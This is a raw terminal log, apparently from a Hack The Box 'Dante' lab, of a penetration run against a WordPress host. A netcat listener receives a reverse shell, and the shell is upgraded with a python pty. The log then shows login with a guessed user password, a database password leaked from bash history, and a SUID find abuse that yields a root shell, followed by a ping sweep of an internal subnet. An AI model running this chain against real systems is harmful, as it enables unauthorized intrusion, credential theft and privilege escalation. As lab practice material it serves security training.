─[eu-dedi-pro-61]─[10.10.14.64]─[lukaszfd84@htb-glaiktz6di]─[~]
└──╼ [★]$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.64] from (UNKNOWN) [10.10.110.100] 38390
bash: cannot set terminal process group (1101): Inappropriate ioctl for device
bash: no job control in this shell
<w/html/wordpress/wp-content/themes/twentynineteen$ www-data@DANTE-WEB-NIX01:home$ ls -al
<entynineteen$ www-data@DANTE-WEB-NIX01:home$ ls -al
www-data@DANTE-WEB-NIX01:home$: command not found
<w/html/wordpress/wp-content/themes/twentynineteen$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
<w/html/wordpress/wp-content/themes/twentynineteen$ :/home$ ls -al
:/home$ ls -al
bash: :/home$: No such file or directory
<w/html/wordpress/wp-content/themes/twentynineteen$ cat flag.txt
cat flag.txt
cat: flag.txt: No such file or directory
<w/html/wordpress/wp-content/themes/twentynineteen$ www-data
www-data
www-data: command not found
<w/html/wordpress/wp-content/themes/twentynineteen$ www-data@DANTE-WEB-NIX01:home$ ls -al
<entynineteen$ www-data@DANTE-WEB-NIX01:home$ ls -al
www-data@DANTE-WEB-NIX01:home$: command not found
<w/html/wordpress/wp-content/themes/twentynineteen$ www-data@DANTE-WEB-NIX01:/home$ ls -al
<ntynineteen$ www-data@DANTE-WEB-NIX01:/home$ ls -al
bash: www-data@DANTE-WEB-NIX01:/home$: No such file or directory
<w/html/wordpress/wp-content/themes/twentynineteen$ cd ..
cd ..
www-data@DANTE-WEB-NIX01:/var/www/html/wordpress/wp-content/themes$ cat flag.txt
</www/html/wordpress/wp-content/themes$ cat flag.txt
cat: flag.txt: No such file or directory
www-data@DANTE-WEB-NIX01:/var/www/html/wordpress/wp-content/themes$ cd ..
cd ..
www-data@DANTE-WEB-NIX01:/var/www/html/wordpress/wp-content$ cd ..
cd ..
www-data@DANTE-WEB-NIX01:/var/www/html/wordpress$ cd..
cd..
cd..: command not found
www-data@DANTE-WEB-NIX01:/var/www/html/wordpress$ cd ..
cd ..
www-data@DANTE-WEB-NIX01:/var/www/html$ cd ..
cd ..
www-data@DANTE-WEB-NIX01:/var/www$ cd ..
cd ..
www-data@DANTE-WEB-NIX01:/var$ cd ..
cd ..
www-data@DANTE-WEB-NIX01:/$ cat flag.txt
cat flag.txt
cat: flag.txt: No such file or directory
www-data@DANTE-WEB-NIX01:/$ ls -l
ls -l
total 76
lrwxrwxrwx   1 root root     7 May  9  2020 bin -> usr/bin
drwxr-xr-x   4 root root  4096 May  9  2020 boot
drwxrwxr-x   2 root root  4096 Apr 14  2021 cdrom
drwxr-xr-x  17 root root  4000 Oct  7 01:50 dev
drwxr-xr-x 135 root root 12288 Aug 24  2022 etc
drwxr-xr-x   4 root root  4096 Apr 14  2021 home
lrwxrwxrwx   1 root root     7 May  9  2020 lib -> usr/lib
lrwxrwxrwx   1 root root     9 May  9  2020 lib32 -> usr/lib32
lrwxrwxrwx   1 root root     9 May  9  2020 lib64 -> usr/lib64
lrwxrwxrwx   1 root root    10 May  9  2020 libx32 -> usr/libx32
drwx------   2 root root 16384 May  9  2020 lost+found
drwxr-xr-x   3 root root  4096 Apr 14  2021 media
drwxr-xr-x   2 root root  4096 Apr 23  2020 mnt
drwxr-xr-x   3 root root  4096 Jul 19  2022 opt
dr-xr-xr-x 317 root root     0 Oct  7 01:49 proc
drwx------   7 root root  4096 Dec 15  2022 root
drwxr-xr-x  36 root root   980 Oct  7 03:35 run
lrwxrwxrwx   1 root root     8 May  9  2020 sbin -> usr/sbin
drwxr-xr-x  11 root root  4096 Aug 24  2022 snap
drwxr-xr-x   3 root root  4096 Apr 14  2021 srv
dr-xr-xr-x  13 root root     0 Oct  7 01:49 sys
drwxrwxrwt   2 root root  4096 Oct  7 01:50 tmp
drwxr-xr-x  14 root root  4096 Apr 23  2020 usr
drwxr-xr-x  15 root root  4096 Apr 14  2021 var
www-data@DANTE-WEB-NIX01:/$ cd ..
cd ..
www-data@DANTE-WEB-NIX01:/$ /home$ ls 0al
/home$ ls 0al
bash: /home$: No such file or directory
www-data@DANTE-WEB-NIX01:/$ /home$ ls -al
/home$ ls -al
bash: /home$: No such file or directory
www-data@DANTE-WEB-NIX01:/$ cd home
cd home
www-data@DANTE-WEB-NIX01:/home$ ls -l
ls -l
total 8
drwxr-xr-x 16 balthazar balthazar 4096 Apr 14  2021 balthazar
drwxr-xr-x 17 james     james     4096 Apr 14  2021 james
www-data@DANTE-WEB-NIX01:/home$ cd ..
cd ..
www-data@DANTE-WEB-NIX01:/$ cat flag.txt
cat flag.txt
cat: flag.txt: No such file or directory
www-data@DANTE-WEB-NIX01:/$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@DANTE-WEB-NIX01:/$ ls -l
ls -l
total 76
lrwxrwxrwx   1 root root     7 May  9  2020 bin -> usr/bin
drwxr-xr-x   4 root root  4096 May  9  2020 boot
drwxrwxr-x   2 root root  4096 Apr 14  2021 cdrom
drwxr-xr-x  17 root root  4000 Oct  7 01:50 dev
drwxr-xr-x 135 root root 12288 Aug 24  2022 etc
drwxr-xr-x   4 root root  4096 Apr 14  2021 home
lrwxrwxrwx   1 root root     7 May  9  2020 lib -> usr/lib
lrwxrwxrwx   1 root root     9 May  9  2020 lib32 -> usr/lib32
lrwxrwxrwx   1 root root     9 May  9  2020 lib64 -> usr/lib64
lrwxrwxrwx   1 root root    10 May  9  2020 libx32 -> usr/libx32
drwx------   2 root root 16384 May  9  2020 lost+found
drwxr-xr-x   3 root root  4096 Apr 14  2021 media
drwxr-xr-x   2 root root  4096 Apr 23  2020 mnt
drwxr-xr-x   3 root root  4096 Jul 19  2022 opt
dr-xr-xr-x 322 root root     0 Oct  7 01:49 proc
drwx------   7 root root  4096 Dec 15  2022 root
drwxr-xr-x  36 root root   980 Oct  7 03:35 run
lrwxrwxrwx   1 root root     8 May  9  2020 sbin -> usr/sbin
drwxr-xr-x  11 root root  4096 Aug 24  2022 snap
drwxr-xr-x   3 root root  4096 Apr 14  2021 srv
dr-xr-xr-x  13 root root     0 Oct  7 01:49 sys
drwxrwxrwt   2 root root  4096 Oct  7 01:50 tmp
drwxr-xr-x  14 root root  4096 Apr 23  2020 usr
drwxr-xr-x  15 root root  4096 Apr 14  2021 var
www-data@DANTE-WEB-NIX01:/$ cd home
cd home
www-data@DANTE-WEB-NIX01:/home$ ls -al
ls -al
total 16
drwxr-xr-x  4 root      root      4096 Apr 14  2021 .
drwxr-xr-x 20 root      root      4096 Apr 14  2021 ..
drwxr-xr-x 16 balthazar balthazar 4096 Apr 14  2021 balthazar
drwxr-xr-x 17 james     james     4096 Apr 14  2021 james
www-data@DANTE-WEB-NIX01:/home$ su - james
su - james
Password: Toyota

james@DANTE-WEB-NIX01:~$ cat flag.txt
cat flag.txt
DANTE{j4m3s_NEEd5_a_p455w0rd_M4n4ger!}
james@DANTE-WEB-NIX01:~$ cat .bash_history
cat .bash_history
cd /home/balthazar
rm .mysql_history
mysql -u balthazar -p TheJoker12345!
james@DANTE-WEB-NIX01:~$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/bin/mount
/usr/bin/chsh
/usr/bin/pkexec
/usr/bin/su
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/vmware-user-suid-wrapper
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/find
/usr/bin/sudo
cat /root/flag.txt
cat /root/flag.txt
/usr/sbin/pppd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/xorg/Xorg.wrap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/snap/core20/1611/usr/bin/chfn
/snap/core20/1611/usr/bin/chsh
/snap/core20/1611/usr/bin/gpasswd
/snap/core20/1611/usr/bin/mount
/snap/core20/1611/usr/bin/newgrp
/snap/core20/1611/usr/bin/passwd
/snap/core20/1611/usr/bin/su
/snap/core20/1611/usr/bin/sudo
/snap/core20/1611/usr/bin/umount
/snap/core20/1611/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1611/usr/lib/openssh/ssh-keysign
/snap/snapd/16292/usr/lib/snapd/snap-confine
/snap/core18/2246/bin/mount
/snap/core18/2246/bin/ping
/snap/core18/2246/bin/su
/snap/core18/2246/bin/umount
/snap/core18/2246/usr/bin/chfn
/snap/core18/2246/usr/bin/chsh
/snap/core18/2246/usr/bin/gpasswd
/snap/core18/2246/usr/bin/newgrp
/snap/core18/2246/usr/bin/passwd
/snap/core18/2246/usr/bin/sudo
/snap/core18/2246/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2246/usr/lib/openssh/ssh-keysign
/snap/core18/2538/bin/mount
/snap/core18/2538/bin/ping
/snap/core18/2538/bin/su
/snap/core18/2538/bin/umount
/snap/core18/2538/usr/bin/chfn
/snap/core18/2538/usr/bin/chsh
/snap/core18/2538/usr/bin/gpasswd
/snap/core18/2538/usr/bin/newgrp
/snap/core18/2538/usr/bin/passwd
/snap/core18/2538/usr/bin/sudo
/snap/core18/2538/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2538/usr/lib/openssh/ssh-keysign
james@DANTE-WEB-NIX01:~$ cat /root/flag.txt
cat: /root/flag.txt: Permission denied
james@DANTE-WEB-NIX01:~$ cat /root/flag.txt
cat /root/flag.txt
cat: /root/flag.txt: Permission denied
james@DANTE-WEB-NIX01:~$ finf . -exec /bin/bash -p \; -quit
finf . -exec /bin/bash -p \; -quit

Command 'finf' not found, did you mean:

  command 'find' from deb findutils (4.7.0-1ubuntu1)

Try: apt install <deb name>

james@DANTE-WEB-NIX01:~$ find . -exec /bin/bash -p \; -quit
find . -exec /bin/bash -p \; -quit
bash-5.0# cat /root/flag.txt
cat /root/flag.txt
DANTE{Too_much_Pr1v!!!!}
bash-5.0# for i in {1..255} ;do (ping -c 1 172.16.1$i | grep "bytes from"|cut -d ' ' -f4|tr -d ':' &);done
< grep "bytes from"|cut -d ' ' -f4|tr -d ':' &);done
bash-5.0# for i in {1..255} ;do (ping -c 1 172.16.1.$i | grep "bytes from"|cut -d ' ' -f4|tr -d ':' &);done
< grep "bytes from"|cut -d ' ' -f4|tr -d ':' &);done
172.16.1.5
172.16.1.10
172.16.1.12
172.16.1.13
172.16.1.17
172.16.1.19
172.16.1.20
172.16.1.100
172.16.1.102
172.16.1.101
bash-5.0# ping: Do you want to ping broadcast? Then -b. If not, check your local firewall rules